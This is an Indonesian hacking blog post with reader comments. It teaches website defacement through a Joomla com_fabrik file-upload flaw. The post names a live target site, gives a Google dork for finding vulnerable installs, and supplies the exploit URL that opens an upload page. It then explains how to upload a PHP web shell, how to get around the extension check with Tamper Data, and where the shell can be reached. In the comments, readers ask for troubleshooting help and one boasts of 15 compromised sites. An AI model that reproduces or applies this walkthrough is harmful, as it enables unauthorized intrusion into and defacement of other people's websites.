Knowledge is Free | We Share To Everywhere

Saturday, March 30, 2013

Deface Dengan Exploit Joomla | com_fabric


Assalamualaikum....

Salam kompak Sobat IDCA,

Lanjut lagi Walking Blogg :D

Nah, kali ini saya cuma mau berbagi saja tentang Exploit Joomla, walaupun ini bugs lama, tapi masih bisa juga digunakan untuk depes2,, wkwkwk :D

Sebelumnya sedikit Nasihat dari saya :

"Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"


Oke, langsung aja... Berikut langkah2nya:

Live Target: http://sercaca.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=1&Itemid=0

1. Gunakan Dork untuk mencari Target di Google

inurl:index.php?option=com_fabrik


 2. Selanjutnya Pilih target sobat, disini ane udah nemu target... langsung aja di eksploitasi :D


3. Masukin exploitnya berikut;
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka akan muncul halaman upload seperti gambar berikut:

Note: Kalo tidak muncul halaman seperti gambar atau error, silahkan cari target yg lain! :p

4. upload shell sobat, klik Browse dan pilih shell sobat lalu klik Import CSV

Note: Kalo ga bisa upload ext. PHP coba gunakan Tamper data, tapi kalo ga bisa juga coba aja upload file .html, .txt  :)


5. Setelah itu lihat hasil upload shell sobat di http://site.com/media/shell.php



 Note: Kalo ga berhasil atau error, cari target lain aja :D

7. Goodluck! :p

Video Tutorial





 Content Created By Onix AQua

31 comments:

  1. kok muncul tulisan "File must csv"

    ReplyDelete
  2. yg di upload ke csv.y script deface an kita ea gan

    ReplyDelete
  3. thx bnget
    ni yang gua cri

    :D

    sLAM DeVil-BlacK J (sory pke anonym gy cpek buka blog)

    ReplyDelete
    Replies
    1. kalau berhasil tulisannya apa?
      n shellnya pakai apa?

      Delete
  4. kalau dah diupload
    buka ..../media gk bsa

    tlong pencerahan

    ReplyDelete
    Replies
    1. web ga vuln itu om,, jdi cri trget yg bner2 bsa di eksekusi klo shellnya udh diupload.. :)

      Delete
  5. shell backdoor yg versi berapa Gan banyak nie macamnya tolong pencerahanya donk NewBy nie.... Pertamax

    ReplyDelete
  6. Pembohongan publik -_-

    ReplyDelete
    Replies
    1. karna tk mampu makanya bisa mengatakn itu ^_^
      pdhal teknik ini masih dipake ma para defacer... :p


      #bocah

      Delete
    2. Pembohongan publik apaan ?
      ane uda dapet 15 web :V
      LOL

      Delete
    3. Cius nih gan kagak ngarti nih

      Delete
    4. Note: Kalo ga berhasil atau error, cari target lain aja :D

      disini gak ada namanya pembohongan :D

      orang udah di test sama admin kok :D

      Delete
  7. bro kalo berhasil diupload shellnya gmana gmbarnya???

    ReplyDelete
    Replies
    1. simple aja om, klo udh upload shellnya, coba aja eksekusi shell, klo bisa, berarti upload brhasil, klo ga coba cri lgi dah trget yg lain :D

      Delete
  8. sip bro,thanks :D

    ReplyDelete
  9. waktu sudah di upload tapi ,, waktu buka site/media ga ada (blank) knp to

    ReplyDelete
  10. Om Bimo , Kok Habis Upload Shell Kok Shellnya Ga Bisa Di Akses , Apa Salah ? Apa Webnya no vuln ya ? ;( ;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(;(
    (maaf Spam Detected )

    ReplyDelete
  11. Bos tolong buatin videobya donk ane masih bingung cara upload shell ;((
    dan ini juga maksudnya apa ? Note: Kalo ga bisa upload ext. PHP coba gunakan Tamper data, tapi kalo ga bisa juga coba aja upload file .html, .txt

    :>) :>) :>) :>)

    ReplyDelete

Note: Only a member of this blog may post a comment.